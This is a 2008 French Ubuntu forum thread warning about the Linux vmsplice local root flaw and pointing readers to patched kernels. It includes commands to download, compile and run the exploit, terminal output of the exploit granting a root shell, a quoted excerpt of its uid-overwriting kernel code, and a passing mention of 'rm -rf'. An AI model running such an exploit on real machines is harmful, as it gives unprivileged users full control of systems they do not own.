[ATTENTION] Faille de sécurité critique dans le noyau Linux !

HymnToLife · Le 11/02/2008, à 11:37

EDIT : Un correctif est - enfin - disponible dans les dépà´ts Ubuntu. Faites vos mises à jour en suivant la procédure habituelle et tout devrait rentrer dans l'ordre.
~~~~~

Une importante faille de sécurité a été découverte dans le noyau Linux, pour les versions 2.6.17 à 2.6.24.1 incluses. Cette faille permet à n'importe quel utilisateur disposant d'un accès à la machine QUEL QU'IL SOIT d'obtenir les droits de superutilisateur TRàˆS SIMPLEMENT.

à€ la minute oà¹ j'écris ceci, aucun correctif n'a été appliqué au noyau présent dans les dépà´ts d'Ubuntu Gutsy, et le seul moyen de se prémunir contre cette faille est de compiler manuellement un noyau 2.6.24.2 ou supérieur comme expliqué par exemple ici.

Pour les heureux possesseurs d'un Asus EeePC, je dispose de paquets DEB d'un 2.6.24.2 que je peux mettre à disposition si ça intéresse.

Les noyaux 2.6.22.18 et 2.6.23.16 corrigent également la faille (notez que ces numérotations sont celles des noyaux officiels, et n'ont rien à voir avec celles employées dans la plupart des distributions).

Si vous voulez vérifier par vous-mêmes, il vous suffit d'intaller le paquet build-essential puis de télécharger et compiler un petit programme C en lançant ces commandes (ce programme n'affectera en rien votre système, il se contente de donner un shell root) :

wget <lien supprimé> -O rootexploit.c
gcc -o rootexploit rootexploit.c
./rootexploit

firas@nobue ~ % uname -r
2.6.22-14-generic
firas@nobue ~ % wget <lien modéré, demandez en privé a l'auteur si vous le voulez> -O rootexploit.c
--18:52:56--  <lien modéré, demandez en privé a l'auteur si vous le voulez>
           => `rootexploit.c'
Resolving paste.ubuntu-nl.org... 81.171.100.21
Connecting to paste.ubuntu-nl.org|81.171.100.21|:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: unspecified [text/plain]

    [ <=>                                                                         ] 7,336         --.--K/s

18:52:57 (53.24 KB/s) - `rootexploit.c' saved [7336]

firas@nobue ~ % gcc -o rootexploit rootexploit.c
firas@nobue ~ % ./rootexploit
-----------------------------------
 Linux vmsplice Local Root Exploit
-----------------------------------
[+] mmap: 0x0 .. 0x1000
[+] page: 0x0
[+] page: 0x20
[+] mmap: 0x4000 .. 0x5000
[+] page: 0x4000
[+] page: 0x4020
[+] mmap: 0x1000 .. 0x2000
[+] page: 0x1000
[+] mmap: 0xb7e13000 .. 0xb7e45000
[+] root
root@nobue:~# whoami
root
root@nobue:~#

Dernière modification par HymnToLife (Le 12/02/2008, à 19:37)

Skippy le Grand Gourou · Le 11/02/2008, à 11:41

Ouah !

HymnToLife · Le 11/02/2008, à 11:43

Skippy le Grand Gourou a écrit :

Ouah !

J'aurais dû planquer un <bout de code malicieux> dedans

Dernière modification par calimarno (Le 11/02/2008, à 19:40)

Koshie-2.0 · Le 11/02/2008, à 11:44

Expliquez moi la blague s'il vous plaà®t !

HymnToLife · Le 11/02/2008, à 11:45

koshie666 a écrit :

Expliquez moi la blague s'il vous plaà®t !

Ce n'est pas une blague, c'est très, très, très sérieux ! Fais et tu verras.

philpep-tlse · Le 11/02/2008, à 11:51

Et alors, j'ai justement appris a ne pas exécuter du code de source non sûre.

Donc si quelqu'un pouvais expliquer pour les gens qui ne lisent pas le C (comme moi)

Skippy le Grand Gourou · Le 11/02/2008, à 11:51

HymnToLife a écrit :

Skippy le Grand Gourou a écrit :
Ouah !
J'aurais dû planquer un <bout de code malicieux> dedans

J'ai eu un moment de doute et ouvert la source avant de le lancer, et je me suis dit "bof, c'est HTL... Et si il s'était fait pirater son compte ? Allez, ce sera l'occasion de réinstaller, ça tombe bien je suis surmené en ce moment... à‡a de plus ou de moins..."

Dernière modification par calimarno (Le 11/02/2008, à 19:40)

Skippy le Grand Gourou · Le 11/02/2008, à 11:52

philpep-tlse a écrit :

Et alors, j'ai justement appris a ne pas exécuter du code de source non sûre.
Donc si quelqu'un pouvais expliquer pour les gens qui ne lisent pas le C (comme moi)

Et personne ne t'a dit que tu pouvais avoir confiance envers les piliers de bar comme HTL ?

à‡a passe ton terminal en superutilisateur.

HymnToLife · Le 11/02/2008, à 11:56

philpep-tlse a écrit :

Et alors, j'ai justement appris a ne pas exécuter du code de source non sûre.
Donc si quelqu'un pouvais expliquer pour les gens qui ne lisent pas le C (comme moi)

firas@mamirin ~ % uname -r
2.6.24.1-mamirin
firas@mamirin ~ % gcc -o rootexploit rootexploit.c
firas@mamirin ~ % ./rootexploit
-----------------------------------
 Linux vmsplice Local Root Exploit
-----------------------------------
[+] mmap: 0x0 .. 0x1000
[+] page: 0x0
[+] page: 0x20
[+] mmap: 0x4000 .. 0x5000
[+] page: 0x4000
[+] page: 0x4020
[+] mmap: 0x1000 .. 0x2000
[+] page: 0x1000
[+] mmap: 0xb7d66000 .. 0xb7d98000
[+] root
root@mamirin:~#

philpep-tlse · Le 11/02/2008, à 11:57

Skippy le Grand Gourou a écrit :

philpep-tlse a écrit :
Et alors, j'ai justement appris a ne pas exécuter du code de source non sûre.
Donc si quelqu'un pouvais expliquer pour les gens qui ne lisent pas le C (comme moi)
Et personne ne t'a dit que tu pouvais avoir confiance envers les piliers de bar comme HTL ?
à‡a passe ton terminal en superutilisateur.

En même temps tu m'aurais dit que ça fait du café je ne t'aurais pas cru non plus.
Puis les mises a jours c'est pas pour les chiens.

EDITH, ok je vois, mais c'est hyper grave comme problème ! En gros n'importe quel programme lancé en utilisateur normal peut avoir un accès Root sur la machine... Heureusement je suis encore en 2.6.23, y'a des explication à cette énormité ?

REEDITH, du 2.6.17 au 2.6.24-1 ?? Damned ! Y'a un lien officiel, genre Torvalds qui pleure en nous disant ça ?

Dernière modification par philpep-tlse (Le 11/02/2008, à 12:03)

Skippy le Grand Gourou · Le 11/02/2008, à 12:00

philpep-tlse a écrit :

Puis les mises a jours c'est pas pour les chiens.

Sauf que le noyau 2.6.17 est là depuis un bon moment déjà (au moins Edgy). Et si tu es sous Edgy par exemple, a priori pas de MAJ du noyau disponible (ou je me trompe ?)...

HymnToLife · Le 11/02/2008, à 12:02

philpep-tlse a écrit :

EDITH, ok je vois, mais c'est hyper grave comme problème ! En gros n'importe quel programme lancé en utilisateur normal peut avoir un accès Root sur la machine... Heureusement je suis encore en 2.6.23, y'a des explication à cette énormité ?

Nobody's perfect, les devs sont humains, ils ne peuvent pas penser à tout Et comme j'ai dit, ça affecte toutes les versions de la 2.6.17 à la 2.6.24.1, donc tu ferais bien de mettre à jour ton 2.6.23 fissa...

Dernière modification par HymnToLife (Le 11/02/2008, à 12:03)

Zelfy · Le 11/02/2008, à 12:05

le root exploit... le grand méchant loup de GNU/linux.

Utile quand on a oublier son MDP root

Dernière modification par Zelfy (Le 11/02/2008, à 12:06)

Koshie-2.0 · Le 11/02/2008, à 12:08

Je n'ai jamais encore fait ça donc je vais passer pour un con, mais comment on met à jour son noyau? C'est long? Compliqué? Risqué?

Merci !

HymnToLife · Le 11/02/2008, à 12:10

http://doc.ubuntu-fr.org/tutoriel/comment_compiler_un_kernel_de_kernel.org?s=noyau

Koshie-2.0 · Le 11/02/2008, à 12:14

Merci mon chou ! Je ferais ça cette aprèm ou demain quand j'aurais deux bonne heures de libre.

Dernière modification par koshie666 (Le 11/02/2008, à 12:17)

philpep-tlse · Le 11/02/2008, à 12:17

static uint uid, gid;

void    kernel_code()
{
        int     i;
        uint    *p = get_current();

        for (i = 0; i < 1024-13; i++) {
                if (p[0] == uid && p[1] == uid &&
                    p[2] == uid && p[3] == uid &&
                    p[4] == gid && p[5] == gid &&
                    p[6] == gid && p[7] == gid) {
                        p[0] = p[1] = p[2] = p[3] = 0;
                        p[4] = p[5] = p[6] = p[7] = 0;
                        p = (uint *) ((char *)(p + 8) + sizeof(void *));
                        p[0] = p[1] = p[2] = ~0;
                        break;
                }
                p++;
        }

        exit_kernel();

Hum, c'est pas du fake root tous ses uid qui valent 0 ? ça me parait bizarre comme truc... En même temps j'y connais pas grand chose. Quand j'aurais du courage je l'exécute ! Si tu pouvais m'expliquer les grandes lignes du code.

EDITH, il est limité quand même ton rootexploit, pas possible de faire un fdisk. J'ai pas éssayé un <bout de code malicieux> mais ça me parrait être du fakeroot.

EDITH2 > et le $HOME du faux root c'est le même que celui de l'user.

Tu voudrais pas nous faire compiler des kernel pour rien par hasard ?

Dernière modification par calimarno (Le 11/02/2008, à 19:41)

Skippy le Grand Gourou · Le 11/02/2008, à 12:28

philpep-tlse a écrit :

EDITH, il est limité quand même ton rootexploit, pas possible de faire un fdisk. J'ai pas éssayé un rm -rf mais ça me parrait être du fakeroot.
EDITH2 > et le $HOME du faux root c'est le même que celui de l'user.

Ben chez moi je peux toucher au fstab ou à grub, quand même...

philpep-tlse · Le 11/02/2008, à 12:33

Ouais, ça reste dangereux car le rm sur des fichier sur lesquel seul root à des droits marche assez bien...

Qui est l'heureux créateur de ce code ?

winael · Le 11/02/2008, à 12:42

Bon dès ce soir je regarde en quel noyau je suis... etonnant que personne n'est découvert la faille avant ca fait peur

Skippy le Grand Gourou · Le 11/02/2008, à 12:43

Oui, je trouve rien concernant cette faille sur le net, elle sort d'oà¹ ? C'est toi qu'a écris le code ? T'as prévenu Linus & Cie ? Le 2.6.24.2 corrige bien cette faille ?

Dernière modification par Skippy le Grand Gourou (Le 11/02/2008, à 12:43)

HymnToLife · Le 11/02/2008, à 12:45

Skippy le Grand Gourou a écrit :

Oui, je trouve rien concernant cette faille sur le net, elle sort d'oà¹ ? C'est toi qu'a écris le code ? T'as prévenu Linus & Cie ? Le 2.6.24.2 corrige bien cette faille ?

Tu as mal cherché... Et oui, le 2.6.24.2 corrige ça :

http://it.slashdot.org/it/08/02/10/2011257.shtml
http://www.kernel.org/pub/linux/kernel/v2.6/ChangeLog-2.6.24.2

winael · Le 11/02/2008, à 12:49

question con si on fait ses mise à jour auto comme il faut on est bon ou pas ?

Luckynow · Le 11/02/2008, à 12:51

Il y aura un patch pour le 2.6.22 ?
Pas envie de passer en unstable juste pour une histoire de kernel....
J'ai lu le bugzilla de gentoo, c'est patché pour le 2.6.24 mais quid des précédents ?
Ceci dit ça reste un exploit local, faut déjà vouloir éxécuter un virus pour y arriver.
Edit c'est fait dans le 2.6.22.18, a savoir maintenant combien de temps il faudra attendre pour qu'il attérisse dans les mise à jour de gutsy

Dernière modification par Luckynow (Le 11/02/2008, à 13:01)

HymnToLife · Le 11/02/2008, à 12:54

winael a écrit :

question con si on fait ses mise à jour auto comme il faut on est bon ou pas ?

Pour le moment non, mais je pense que ça va venir. M'étonnerait que les devs d'Ubuntu laissent ça.

Ubuntu-fr

Navigation

Liens de recherche

Annonce

#1 Le 11/02/2008, à 11:37

[ATTENTION] Faille de sécurité critique dans le noyau Linux !

#2 Le 11/02/2008, à 11:41

Re : [ATTENTION] Faille de sécurité critique dans le noyau Linux !

#3 Le 11/02/2008, à 11:43

Re : [ATTENTION] Faille de sécurité critique dans le noyau Linux !

#4 Le 11/02/2008, à 11:44

Re : [ATTENTION] Faille de sécurité critique dans le noyau Linux !

#5 Le 11/02/2008, à 11:45

Re : [ATTENTION] Faille de sécurité critique dans le noyau Linux !

#6 Le 11/02/2008, à 11:51

Re : [ATTENTION] Faille de sécurité critique dans le noyau Linux !

#7 Le 11/02/2008, à 11:51

Re : [ATTENTION] Faille de sécurité critique dans le noyau Linux !

#8 Le 11/02/2008, à 11:52

Re : [ATTENTION] Faille de sécurité critique dans le noyau Linux !

#9 Le 11/02/2008, à 11:56

Re : [ATTENTION] Faille de sécurité critique dans le noyau Linux !

#10 Le 11/02/2008, à 11:57

Re : [ATTENTION] Faille de sécurité critique dans le noyau Linux !

#11 Le 11/02/2008, à 12:00

Re : [ATTENTION] Faille de sécurité critique dans le noyau Linux !

#12 Le 11/02/2008, à 12:02

Re : [ATTENTION] Faille de sécurité critique dans le noyau Linux !

#13 Le 11/02/2008, à 12:05

Re : [ATTENTION] Faille de sécurité critique dans le noyau Linux !

#14 Le 11/02/2008, à 12:08

Re : [ATTENTION] Faille de sécurité critique dans le noyau Linux !

#15 Le 11/02/2008, à 12:10

Re : [ATTENTION] Faille de sécurité critique dans le noyau Linux !

#16 Le 11/02/2008, à 12:14

Re : [ATTENTION] Faille de sécurité critique dans le noyau Linux !

#17 Le 11/02/2008, à 12:17

Re : [ATTENTION] Faille de sécurité critique dans le noyau Linux !

#18 Le 11/02/2008, à 12:28

Re : [ATTENTION] Faille de sécurité critique dans le noyau Linux !

#19 Le 11/02/2008, à 12:33

Re : [ATTENTION] Faille de sécurité critique dans le noyau Linux !

#20 Le 11/02/2008, à 12:42

Re : [ATTENTION] Faille de sécurité critique dans le noyau Linux !

#21 Le 11/02/2008, à 12:43

Re : [ATTENTION] Faille de sécurité critique dans le noyau Linux !

#22 Le 11/02/2008, à 12:45

Re : [ATTENTION] Faille de sécurité critique dans le noyau Linux !

#23 Le 11/02/2008, à 12:49

Re : [ATTENTION] Faille de sécurité critique dans le noyau Linux !

#24 Le 11/02/2008, à 12:51

Re : [ATTENTION] Faille de sécurité critique dans le noyau Linux !

#25 Le 11/02/2008, à 12:54

Re : [ATTENTION] Faille de sécurité critique dans le noyau Linux !

Pied de page des forums